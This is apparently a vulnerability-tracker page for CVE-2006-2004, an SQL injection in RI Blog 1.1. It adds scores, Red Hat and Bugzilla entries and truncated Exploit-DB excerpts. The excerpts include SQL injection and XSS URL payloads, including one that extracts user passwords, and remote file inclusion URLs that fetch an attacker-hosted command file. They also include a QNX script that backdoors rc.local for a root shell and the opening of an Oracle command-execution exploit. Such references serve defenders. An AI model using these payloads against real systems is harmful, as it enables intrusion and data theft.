CVE-2006-2004
published 2006-04-25CVE-2006-2004: Multiple SQL injection vulnerabilities in RI Blog 1.1 allow remote attackers to execute arbitrary SQL command via the (1) username or (2) password fields.
PriorityP338high7.5CVSS 2.0
AVNACLAuNCPIPAP
EPSS
1.43%
69.7th percentile
Multiple SQL injection vulnerabilities in RI Blog 1.1 allow remote attackers to execute arbitrary SQL command via the (1) username or (2) password fields.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| michael_romedahl | ri_blog | — | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat9.3CRITICAL
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-3j54-rx6j-frg9: Multiple SQL injection vulnerabilities in RI Blog 1
ghsa_unreviewed·2022-05-01
CVE-2006-2004 [HIGH] GHSA-3j54-rx6j-frg9: Multiple SQL injection vulnerabilities in RI Blog 1
Multiple SQL injection vulnerabilities in RI Blog 1.1 allow remote attackers to execute arbitrary SQL command via the (1) username or (2) password fields.
Red Hat
security flaw
vendor_redhat·2006-09-12·CVSS 5.1
CVE-2006-3311 [MEDIUM] security flaw
security flaw
Buffer overflow in Adobe Flash Player 8.0.24.0 and earlier, Flash Professional 8, Flash MX 2004, and Flex 1.5 allows user-assisted remote attackers to execute arbitrary code via a long, dynamically created string in a SWF movie.
Red Hat
security flaw
vendor_redhat·2006-02-12·CVSS 7.5
CVE-2006-0709 [HIGH] security flaw
security flaw
Buffer overflow in Metamail 2.7-50 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via e-mail messages with a long boundary attribute, a different vulnerability than CVE-2004-0105.
Red Hat
CVE-2004-1051 bash scripts run via Sudo can be subverted (CVE-2005-4158, CVE-2006-0151)
vendor_redhat·2004-11-11·CVSS 7.2
CVE-2004-1051 [HIGH] CVE-2004-1051 bash scripts run via Sudo can be subverted (CVE-2005-4158, CVE-2006-0151)
CVE-2004-1051 bash scripts run via Sudo can be subverted (CVE-2005-4158, CVE-2006-0151)
sudo before 1.6.8p2 allows local users to execute arbitrary commands by using "()" style environment variables to create functions that have the same name as any program within the bash script that is called without using the program's full pathname.
Statement: We do not consider this to be a security issue:
http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=139478#c1
Red Hat
CVE-2004-1051 bash scripts run via Sudo can be subverted (CVE-2005-4158, CVE-2006-0151)
vendor_redhat·2004-11-11·CVSS 7.2
CVE-2005-4158 [HIGH] CVE-2004-1051 bash scripts run via Sudo can be subverted (CVE-2005-4158, CVE-2006-0151)
CVE-2004-1051 bash scripts run via Sudo can be subverted (CVE-2005-4158, CVE-2006-0151)
Sudo before 1.6.8 p12, when the Perl taint flag is off, does not clear the (1) PERLLIB, (2) PERL5LIB, and (3) PERL5OPT environment variables, which allows limited local users to cause a Perl script to include and execute arbitrary library files that have the same name as library files that are included by the script.
Statement: We do not consider this to be a security issue.
https://bugzilla.redhat.com/show_bug.cgi?id=139478#c1
Red Hat
CVE-2006-1017: The c-client library 2000, 2001, or 2004 for PHP before 4
vendor_redhat·CVSS 9.3
CVE-2006-1017 [CRITICAL] CVE-2006-1017: The c-client library 2000, 2001, or 2004 for PHP before 4
The c-client library 2000, 2001, or 2004 for PHP before 4.4.4 and 5.x before 5.1.5 do not check the (1) safe_mode or (2) open_basedir functions, and when used in applications that accept user-controlled input for the mailbox argument to the imap_open function, allow remote attackers to obtain access to an IMAP stream data structure and conduct unauthorized IMAP actions.
Statement: We do not consider safe_mode / open_basedir restriction bypass issues being security sensitive. For more details see http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=169857#c1 and http://www.php.net/security-note.php
No detection rules found.
Exploit-DB
PMB Services 3.0.13 - Multiple Remote File Inclusions
exploitdb·2007-03-09
CVE-2007-1415 PMB Services 3.0.13 - Multiple Remote File Inclusions
PMB Services 3.0.13 - Multiple Remote File Inclusions
---
____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/
.OR.ID
ECHO_ADV_68$2007
[ECHO_ADV_68$2007] PMB Services
- - Invalid include function at opac_css/includes/author_see.inc.php :
--------------------opac_css/includes/author_see.inc.php------------------------
<?php
// +-------------------------------------------------+
// © 2002-2004 PMB Services / www.sigb.net [email protected] et contributeurs (voir www.sigb.net)
// +-------------------------------------------------+
// $Id: author_see.inc.php,v 1.32 2006/12/29 16:10:04 touraine37 Exp $
// affichage du detail pour un auteur
require_once($base_path.'/includes/templates
Exploit-DB
Oracle 9i/10g - 'extproc' Local/Remote Command Execution
exploitdb·2006-12-19·CVSS 8.5
CVE-2004-1364 [HIGH] Oracle 9i/10g - 'extproc' Local/Remote Command Execution
Oracle 9i/10g - 'extproc' Local/Remote Command Execution
---
--
-- $Id: raptor_oraextproc.sql,v 1.1 2006/12/19 14:21:00 raptor Exp $
--
-- raptor_oraextproc.sql - command exec via oracle extproc
-- Copyright (c) 2006 Marco Ivaldi
--
-- Directory traversal vulnerability in extproc in Oracle 9i and 10g
-- allows remote attackers to access arbitrary libraries outside of the
-- $ORACLE_HOME\bin directory (CVE-2004-1364).
--
-- This PL/SQL code exploits the Oracle extproc directory traversal bug
-- to remotely execute arbitrary OS commands with the privileges of the DBMS
-- user (the CREATE [ANY] LIBRARY privilege is needed).
--
-- See also:
-- http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql
-- http://www.0xdeadbeef.info/exploits/raptor_orafile.sql
--
-- Vulnerable platforms:
-- Oracle
Exploit-DB
vSpin Classified System 2004 - 'cat.asp?catname' Cross-Site Scripting
exploitdb·2006-11-20
CVE-2006-6153 vSpin Classified System 2004 - 'cat.asp?catname' Cross-Site Scripting
vSpin Classified System 2004 - 'cat.asp?catname' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/21190/info
vSpin Classified System is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/cat.asp?cat=1&catname=[xss]
Exploit-DB
vSpin Classified System 2004 - 'cat.asp?cat' SQL Injection
exploitdb·2006-11-20
CVE-2006-6152 vSpin Classified System 2004 - 'cat.asp?cat' SQL Injection
vSpin Classified System 2004 - 'cat.asp?cat' SQL Injection
---
source: https://www.securityfocus.com/bid/21190/info
vSpin Classified System is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/cat.asp?cat='[sql]
Exploit-DB
vSpin Classified System 2004 - 'search.asp?minprice' Cross-Site Scripting
exploitdb·2006-11-20
CVE-2006-6153 vSpin Classified System 2004 - 'search.asp?minprice' Cross-Site Scripting
vSpin Classified System 2004 - 'search.asp?minprice' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/21190/info
vSpin Classified System is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/search.asp?in=y&keyword=1&submit=Search&order=tbl_classads.col_id&sort=DESC&cat=0&menuSelect=1&type=1&city=1&minprice=[xss]
Exploit-DB
vSpin Classified System 2004 - 'search.asp' Multiple SQL Injections
exploitdb·2006-11-20
CVE-2006-6152 vSpin Classified System 2004 - 'search.asp' Multiple SQL Injections
vSpin Classified System 2004 - 'search.asp' Multiple SQL Injections
---
source: https://www.securityfocus.com/bid/21190/info
vSpin Classified System is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/search.asp?in=y&keyword='[sql]
http://www.example.com/search.asp?in=y&keyword=1&submit=Search&order='[sql]
http://www.example.com/search.asp?in=y&keyword=1&submit=Search&order=tbl_classads.col_id&sort='[sql]
ht
Exploit-DB
JAF CMS 4.0 RC1 - Multiple Remote File Inclusions
exploitdb·2006-10-04
CVE-2008-1609 JAF CMS 4.0 RC1 - Multiple Remote File Inclusions
JAF CMS 4.0 RC1 - Multiple Remote File Inclusions
---
#===========================================================================================
#JAF CMS Remote file include (website)
#===========================================================================================
#
#Script name : JAF CMS
#
#Version : 4.0
#
#===========================================================================================
#Vulnerable Code :
#
# if(isset($category) || isset($id)) { include($website.$main_dir."forum.php"); return;}
#
#===========================================================================================
#Dork : powered by JAF CMS © 2004 - 2006
#
#Exploit :
#(1)
#http://www.site.com/[jmf_path]/module/forum/main.php?id=1&main_dir=http://www.milw0rm.com/index.php?&
#(2)
#http://ww
Exploit-DB
Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution
exploitdb·2006-07-06
CVE-2006-3431 Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution
Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution
---
source: https://www.securityfocus.com/bid/18872/info
Microsoft Excel is prone to a remote code-execution vulnerability.
Successfully exploiting this issue allows attackers to execute arbitrary code in the context of targeted users.
A proof-of-concept malicious code named 'Trojan.Hongmosa' is actively exploiting this vulnerability, which results in crashing Excel running on Simplified Chinese, Traditional Chinese, Japanese, or Korean Windows.
Note that Microsoft Office applications include functionality to embed Office files as objects contained in other Office files. As an example, Microsoft Word files may contain embedded malicious Microsoft Excel files, making Word documents another possible attack vect
Exploit-DB
Randshop 1.1.1 - 'header.inc.php' Remote File Inclusion
exploitdb·2006-07-01
CVE-2006-3375 Randshop 1.1.1 - 'header.inc.php' Remote File Inclusion
Randshop 1.1.1 - 'header.inc.php' Remote File Inclusion
---
Title : randshop <= 1.1.1 Remote File Inclusion Vulnerability
-
URL : http://www.randshop.com/
-
Author : OLiBekaS
-
contact : olibekas[at]gmail.com
-
dork : "software 2004-2005 by randshop"
-
exploit : http://[target]/[path]/includes/header.inc.php?dateiPfad=http://[attacker]/cmd.txt?&cmd=ls
-
greatz : Renzokuzen, skulmatic, sikunYuk, ulga, bigmaster, cgibin, weleh, and all #papmahackerlink crew
-
# milw0rm.com [2006-07-01]
Exploit-DB
Easy-Content Forums 1.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities
exploitdb·2006-05-26
CVE-2006-2697 Easy-Content Forums 1.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities
Easy-Content Forums 1.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities
---
ENGLISH
# Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Dork : "Copyright 2004 easy-content forums"
# Author : ajann
# Exploit;
SQL INJECT.ON--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=SQL TEXT
### http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x
Example:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
XSS--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=xss TEXT
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT
Example:
http://[target]/[path]/topics.asp?catid=30&forumn
Exploit-DB
WebAlbum 2.02pl - COOKIE[skin2] Remote Code Execution
exploitdb·2006-03-25
CVE-2006-1480 WebAlbum 2.02pl - COOKIE[skin2] Remote Code Execution
WebAlbum 2.02pl - COOKIE[skin2] Remote Code Execution
---
#!/usr/bin/php -q -d short_open_tag=on
this works with magic_quotes_gpc=Off\r\n";
echo "dork: WEBalbum 2004-2006 duda\r\n";
if ($argc 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$
Exploit-DB
QNX RTOS 6.3.0 - Insecure 'rc.local' Permissions System Crash / Privilege Escalation
exploitdb·2006-02-08
CVE-2006-0623 QNX RTOS 6.3.0 - Insecure 'rc.local' Permissions System Crash / Privilege Escalation
QNX RTOS 6.3.0 - Insecure 'rc.local' Permissions System Crash / Privilege Escalation
---
#!/bin/sh
# this combines http://www.idefense.com/intelligence/vulnerabilities/display.php?id=387
# and http://www.idefense.com/intelligence/vulnerabilities/display.php?id=386
# into local r00t w00t t00t t00t, hugs and kisses from www.lort.dk.
# unset PAGER; man chmod | mail -s "urgent reading" [email protected]
# kokanin discovered this around august/september 2004
echo "performing check"
if [ -w /etc/rc.d/rc.local ] ;
then echo "check passed, backdooring system" &&
cat >/tmp/moo.c > /etc/rc.d/rc.local && echo "rc.local backdoored,\
crashing system" && echo -e "break *0xb032d59f\nr\ncont\ncont" | gdb gdb;
int main(){
setuid(0);
system("/bin/sh");
}
__EOF__
else echo "system is not a default QNX 6.3.0
Exploit-DB
AndoNET Blog 2004.9.2 - 'Comentarios.php' SQL Injection
exploitdb·2006-01-26
CVE-2006-0462 AndoNET Blog 2004.9.2 - 'Comentarios.php' SQL Injection
AndoNET Blog 2004.9.2 - 'Comentarios.php' SQL Injection
---
source: https://www.securityfocus.com/bid/16393/info
AndoNET Blog is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
Version 2004.09.02 is vulnerable; other versions may also be affected.
http://www.example.com/adonet/index.php?ando=comentarios&entrada=1'%20union%20select%201,2,3,4/*
Exploit-DB
Microsoft Excel 95 < 2004 - Malformed Graphic File Code Execution
exploitdb·2006-01-09
CVE-2006-0030 Microsoft Excel 95 < 2004 - Malformed Graphic File Code Execution
Microsoft Excel 95 < 2004 - Malformed Graphic File Code Execution
---
source: https://www.securityfocus.com/bid/16181/info
Microsoft Excel is susceptible to a code-execution vulnerability. The issue presents itself when Excel tries to process malformed or corrupted XLS files.
Attackers may exploit this issue to execute arbitrary machine code in the context of the affected application.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27055-1.xls
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27055-2.xls
Exploit-DB
Oracle 9i - Multiple Vulnerabilities
exploitdb·2004-08-04·CVSS 8.5
CVE-2004-1364 [HIGH] Oracle 9i - Multiple Vulnerabilities
Oracle 9i - Multiple Vulnerabilities
---
source: https://www.securityfocus.com/bid/10871/info
Reportedly, multiple unspecified Oracle products contain multiple unspecified vulnerabilities.
The reported vulnerabilities include SQL-injection issues, buffer-overflow issues, and others.
There have also been reports that issues covered in this BID and resolved in the referenced Oracle patch include trigger-abuse issues, character-set-conversion bugs, and denial-of-service vulnerabilities. More information is pending.
Note that a number of unsupported versions of affected products may also potentially be vulnerable.
--
-- $Id: raptor_oraextproc.sql,v 1.1 2006/12/19 14:21:00 raptor Exp $
--
-- raptor_oraextproc.sql - command exec via oracle extproc
-- Copyright (c) 2006 Marco Ivaldi
--
--
Bugzilla
CVE-2006-3311 security flaw
bugzilla·2018-08-16·CVSS 5.1
CVE-2006-3311 [MEDIUM] CVE-2006-3311 security flaw
CVE-2006-3311 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Buffer overflow in Adobe Flash Player 8.0.24.0 and earlier, Flash Professional 8, Flash MX 2004, and Flex 1.5 allows user-assisted remote attackers to execute arbitrary code via a long, dynamically created string in a SWF movie.
Bugzilla
CVE-2004-0885 mod_ssl SSLCipherSuite bypass
bugzilla·2008-01-29·CVSS 7.5
CVE-2004-0885 [HIGH] CVE-2004-0885 mod_ssl SSLCipherSuite bypass
CVE-2004-0885 mod_ssl SSLCipherSuite bypass
Common Vulnerabilities and Exposures assigned an identifier CVE-2004-0885 to the following vulnerability:
The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the
"
SSLCipherSuite
"
directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.
References:
http://www.apacheweek.com/features/security-20
http://issues.apache.org/bugzilla/show_bug.cgi?id=31505
http://support.avaya.com/elmodocs2/security/ASA-2006-081.htm
http://lists.apple.com/archives/security-announce/2005/Aug/msg00000.html
http://lists.apple.com/archives/security-announce/2005//Aug/msg00001.html
http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX
Bugzilla
CVE-2004-0940 httpd mod_include SSI overflow
bugzilla·2008-01-28·CVSS 7.8
CVE-2004-0940 [HIGH] CVE-2004-0940 httpd mod_include SSI overflow
CVE-2004-0940 httpd mod_include SSI overflow
Common Vulnerabilities and Exposures assigned an identifier CVE-2004-0940 to the following vulnerability:
Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.
References:
http://support.avaya.com/elmodocs2/security/ASA-2006-081.htm
http://www.debian.org/security/2004/dsa-594
http://www.mandriva.com/security/advisories?name=MDKSA-2004:134
http://www.redhat.com/support/errata/RHSA-2004-600.html
http://marc.theaimsgroup.com/?l=bugtraq&m=109906660225051&w=2
http://www.apacheweek.com/features/security-13
http://www.redhat.com/support/errata/RHSA-2005-816.html
ht
Bugzilla
CVE-2006-5467 Ruby CGI multipart parsing DoS
bugzilla·2006-10-26·CVSS 5.0
CVE-2006-5467 [MEDIUM] CVE-2006-5467 Ruby CGI multipart parsing DoS
CVE-2006-5467 Ruby CGI multipart parsing DoS
+++ This bug was initially created as a clone of Bug #212237 +++
Jeremy Kemper mailed this information to vendor-sec:
Fix an exploitable bug in CGI multipart parsing which affects Ruby <= 1.8.5
when the input stream returns "" (empty string) instead of nil on EOF.
Certain malformed multipart requests leave the parser in a non-terminating
state, leaving the program vulnerable to denial of service attack. The fix
more carefully checks for input stream EOF.
affected: standalone CGI, Mongrel
unaffected: FastCGI, mod_ruby, WEBrick
This fully closes a previously-reported but partially-fixed vulnerability:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0983
http://www.securityfocus.com/bid/11618/info
-- Additional comment from bressers@red
Bugzilla
CVE-2006-5467 Ruby CGI multipart parsing DoS
bugzilla·2006-10-25·CVSS 5.0
CVE-2006-5467 [MEDIUM] CVE-2006-5467 Ruby CGI multipart parsing DoS
CVE-2006-5467 Ruby CGI multipart parsing DoS
Jeremy Kemper mailed this information to vendor-sec:
Fix an exploitable bug in CGI multipart parsing which affects Ruby <= 1.8.5
when the input stream returns "" (empty string) instead of nil on EOF.
Certain malformed multipart requests leave the parser in a non-terminating
state, leaving the program vulnerable to denial of service attack. The fix
more carefully checks for input stream EOF.
affected: standalone CGI, Mongrel
unaffected: FastCGI, mod_ruby, WEBrick
This fully closes a previously-reported but partially-fixed vulnerability:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0983
http://www.securityfocus.com/bid/11618/info
Discussion:
This issue should also affect RHEL2.1 and RHEL3
---
Created attachment 139389
Proposed pat
Bugzilla
CVE-2006-0052 Mailman DoS, CVE-2006-1712 Mailman cross site scripting bug and CVE-2005-3573 Mailman Denial of Service (CVE-2005-4153); also CAN-2004-1177 Cross-site scripting (XSS) vulnerability
bugzilla·2006-06-02·CVSS 5.0
CVE-2006-0052 [MEDIUM] CVE-2006-0052 Mailman DoS, CVE-2006-1712 Mailman cross site scripting bug and CVE-2005-3573 Mailman Denial of Service (CVE-2005-4153); also CAN-2004-1177 Cross-site scripting (XSS) vulnerability
CVE-2006-0052 Mailman DoS, CVE-2006-1712 Mailman cross site scripting bug and CVE-2005-3573 Mailman Denial of Service (CVE-2005-4153); also CAN-2004-1177 Cross-site scripting (XSS) vulnerability
Mailman DoS allows remote attackers to cause a denial of service by using
multipart MIME message with a single part MIME message.
Mailman cross site scripting bug allows remote attackers to inject arbitrary web
script in the form ofaction argument.
In Mailman Denial of Service application crash and server message "fail with an
Overflow on bad date data in a processed message".
http://www.redhat.com/archives/fedora-test-list/2006-May/msg00131.html
http://www.redhat.com/archives/fedora-package-announce/2006-May/msg00134.htm
http://www.redhat.com/archives/fedora-package-announce/2006-May/msg00135.
Bugzilla
CVE-2004-2660 O_DIRECT write sometimes leaks memory
bugzilla·2006-05-15·CVSS 4.9
CVE-2004-2660 [MEDIUM] CVE-2004-2660 O_DIRECT write sometimes leaks memory
CVE-2004-2660 O_DIRECT write sometimes leaks memory
It seems that O_DIRECT write sometimes leaks memory.
The upstream fix can be found here:
http://linux.bkbits.net:8080/linux-2.6/cset@4182a613oVsK0-8eCWpyYFrUf8rhLA
Discussion:
committed in stream E5 build 42.0.1. A test kernel with this patch is available
from http://people.redhat.com/~jbaron/rhel4/
---
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2006-0617.html
---
committed in stream U5 build 42.4. A test kernel
Bugzilla
CVE-2004-1190 Continued raw access issues
bugzilla·2005-05-26·CVSS 2.1
CVE-2004-1190 [LOW] CVE-2004-1190 Continued raw access issues
CVE-2004-1190 Continued raw access issues
CAN-2004-0813 described a flaw allowing anyone with read access to scsi hardware
the ability to write to it too, and this was fixed upstream in 2.6.8. However
since then a number of extra commits have taken place to fix firmware cdrom
issues -- see http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=300162
These may affect RHEL4.
Discussion:
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2006-0101.html
http://colander.altervista.org/advisory/riblog.txthttp://secunia.com/advisories/19783http://www.securityfocus.com/archive/1/431868/100/0/threadedhttp://www.securityfocus.com/bid/17654http://www.vupen.com/english/advisories/2006/1489https://exchange.xforce.ibmcloud.com/vulnerabilities/26132http://colander.altervista.org/advisory/riblog.txthttp://secunia.com/advisories/19783http://www.securityfocus.com/archive/1/431868/100/0/threadedhttp://www.securityfocus.com/bid/17654http://www.vupen.com/english/advisories/2006/1489https://exchange.xforce.ibmcloud.com/vulnerabilities/26132
2006-04-25
Published